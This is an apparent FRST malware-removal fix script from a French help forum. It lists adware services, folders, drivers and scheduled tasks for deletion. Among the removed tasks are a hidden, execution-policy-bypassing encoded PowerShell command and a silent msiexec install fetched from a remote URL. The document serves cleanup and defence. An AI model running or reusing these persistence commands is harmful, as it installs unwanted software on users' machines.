start CloseProcesses: Hosts: CreateRestorePoint: HKLM-x32\...\Run: [] => [X] HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1 HKLM\...\Providers\zwhr6ilc: C:\Program Files (x86)\Wzetionploteing Agent\local64spl.dll C:\Program Files (x86)\Wzetionploteing Agent\local64spl.dll SearchScopes: HKU\S-1-5-21-1169033408-1348241669-2457401725-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = R2 Kyubey; C:\Users\Kahïne\AppData\Roaming\Kyubey\Kyubey.exe [113664 2017-03-01] () [Fichier non signé] C:\Users\Kahïne\AppData\Roaming\Kyubey\Kyubey.exe R2 OtherSearch; C:\Program Files (x86)\RvkYfikrHi\kl.dll [467456 2017-02-21] () [Fichier non signé] <==== ATTENTION C:\Program Files (x86)\RvkYfikrHi\kl.dll R2 WinSnare; C:\Users\Kahïne\AppData\Roaming\WinSnare\WinSnare.dll [778752 2017-03-01] (InterSect Alliance Pty Ltd) [Fichier non signé] C:\Users\Kahïne\AppData\Roaming\WinSnare\WinSnare.dll S2 WinSAPSvc; C:\Users\Kahïne\AppData\Roaming\WinSAPSvc\WinSAP.dll [X] R1 805365e8bae1cc74e42a0d5d1605bc75; C:\Windows\system32\drivers\805365e8bae1cc74e42a0d5d1605bc75.sys [96272 2017-02-17] (A1XDIQ) <==== ATTENTION S3 MSICDSetup; \??\D:\CDriver64.sys [X] S3 NTIOLib_1_0_C; \??\D:\NTIOLib_X64.sys [X] 2017-03-01 14:34 - 2017-03-03 18:18 - 00000000 ____D C:\Users\Kahïne\AppData\Roaming\WinSAPSvc 2017-03-01 14:34 - 2017-03-01 14:34 - 00003668 _____ C:\Windows\System32\Tasks\Milimili 2017-03-01 14:34 - 2017-03-01 14:34 - 00000000 ____D C:\Users\Kahïne\AppData\Roaming\WinSnare 2017-03-01 14:34 - 2017-03-01 14:34 - 00000000 ____D C:\Users\Kahïne\AppData\Roaming\Kyubey 2017-03-01 14:34 - 2017-03-01 14:34 - 00000000 ____D C:\Program Files (x86)\WinSnare(4.2.0) 2017-03-01 14:34 - 2017-03-01 14:34 - 00000000 ____D C:\Program Files (x86)\MIO 2017-03-01 14:34 - 2017-03-01 14:34 - 00003342 _____ C:\Windows\System32\Tasks\BikaQ_FetchAndUpgrade_CanBeDel 2017-03-01 14:34 - 2017-03-01 14:34 - 00000000 ____D C:\Program Files (x86)\BikaQRss 2017-02-22 11:27 - 2017-02-22 11:27 - 00002052 _____ C:\Windows\System32\Tasks\0GDGTRNtwl 2017-02-22 11:26 - 2017-02-22 16:52 - 00000000 ____D C:\Program Files (x86)\RvkYfikrHi 2017-02-22 11:13 - 2017-02-22 11:18 - 00000000 ____D C:\Users\Kahïne\AppData\Roaming\One System Care 2017-02-22 11:13 - 2017-02-22 11:16 - 00000310 _____ C:\Windows\Tasks\One System CarePeriod.job 2017-02-22 11:13 - 2017-02-22 11:13 - 00024460 _____ C:\Windows\System32\Tasks\{0C7F0C47-0E78-0B09-0E11-04790D0A110A} 2017-02-22 11:13 - 2017-02-22 11:13 - 00003688 _____ C:\Windows\System32\Tasks\One System Care Task 2017-02-22 11:13 - 2017-02-22 11:13 - 00003446 _____ C:\Windows\System32\Tasks\One System Care Run Delay 2017-02-22 11:13 - 2017-02-22 11:13 - 00003376 _____ C:\Windows\System32\Tasks\One System Care Monitor 2017-02-22 11:13 - 2017-02-22 11:13 - 00002940 _____ C:\Windows\System32\Tasks\One System CarePeriod 2017-02-22 11:13 - 2017-02-22 11:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care 2017-02-22 11:12 - 2017-02-22 11:16 - 00000000 ____D C:\Program Files (x86)\Wzetionploteing Agent 2017-02-22 11:12 - 2017-02-22 11:12 - 00006142 _____ C:\Windows\System32\Tasks\Wzetionploteing Agent 2017-02-14 11:39 - 2017-02-14 11:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime 2017-02-14 11:39 - 2017-02-14 11:39 - 00000000 ____D C:\Program Files (x86)\QuickTime 2017-02-22 19:10 - 2017-01-25 00:54 - 00003292 _____ C:\Windows\System32\Tasks\OneDrive Standalone Update Task v2 C:\Windows\System32\Tasks\OneDrive Standalone Update Task v2 BikaQ Rss (HKLM-x32\...\{78A2D999-4673-4FCC-818E-57B0AF8F3B70}) (Version: 2.0.16 - BikaQ) <==== ATTENTION OtherSearch (HKLM-x32\...\OtherSearch) (Version: 4.0.0.0 - Skyler Emil) <==== ATTENTION Social2Search (HKLM\...\24e31a98c99476ff052fa026d1c56c37) (Version: 11.13.1.8 (i1.0) - Social2Search) <==== ATTENTION WinSnare (HKLM-x32\...\{8F3FD9A4-A3CB-444A-BAF7-F9A13C2BC1C7}) (Version: 4.2.0 - WinSnare) <==== ATTENTION youndoo - Uninstall (HKLM-x32\...\{9E758FF8-D63C-43B6-BD77-B2613A9868F5}) (Version: - ) <==== ATTENTION youndoo - Uninstall (HKLM-x32\...\{EB175CFA-84CB-4E80-B7D6-723D741A3CDC}) (Version: - ) <==== ATTENTION Task: {126E8528-0E9B-46D5-93A3-31D5B8F7E887} - System32\Tasks\0GDGTRNtwl => C:\Program Files (x86)\RvkYfikrHi\updengine.exe <==== ATTENTION Task: {137E1FC5-2672-4C8E-AA6A-677BC155283C} - System32\Tasks\One System CarePeriod => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe <==== ATTENTION Task: {3EA59DC9-51EE-49C6-8845-D88CCE9B19AE} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-03-01] () Task: {45823CB0-380E-48F1-AEA1-618678555160} - System32\Tasks\Wzetionploteing Agent => C:\Program Files (x86)\Perhuspratph\ghuzaph.exe [2017-02-22] (Glarysoft Ltd) Task: {53B779CB-5691-45F9-8A95-246F66052BE0} - System32\Tasks\{0C7F0C47-0E78-0B09-0E11-04790D0A110A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAgACAAOwAgADsAOwA7ADsAOwAgADsAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcAUAByAGUAZgBlAHIA (l'élément de données a 9992 caractères en plus). <==== ATTENTION Task: {55BE4147-3E4E-4B0F-BEE0-4F18606AB1F0} - System32\Tasks\Pohrythajodom => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=CrucialXCT275MX300SSD1_16451497E56D1497E56D&v=2017222 /q Task: {C4CF87F1-03FF-45B9-82CC-2BB62A549E4B} - System32\Tasks\One System Care Task => C:\PROGRA~2\ONESYS~1\SYSTEM~1.EXE <==== ATTENTION Task: {C68442DB-1B84-478B-A688-5F082E32904A} - System32\Tasks\One System Care Monitor => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe <==== ATTENTION Task: {D79299B6-6FCF-43C1-A474-C626C5B4C924} - System32\Tasks\BikaQ_FetchAndUpgrade_CanBeDel => C:\Program Files (x86)\BikaQRss\BikaQ.exe [2017-02-23] (IEC) <==== ATTENTION Task: {E654EE38-9081-4631-B3DC-8899D2613088} - System32\Tasks\One System Care Run Delay => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe <==== ATTENTION Task: C:\Windows\Tasks\One System CarePeriod.job => <==== ATTENTION 2017-02-21 09:38 - 2017-02-21 09:38 - 00467456 _____ () C:\Program Files (x86)\RvkYfikrHi\kl.dll EmptyTemp: end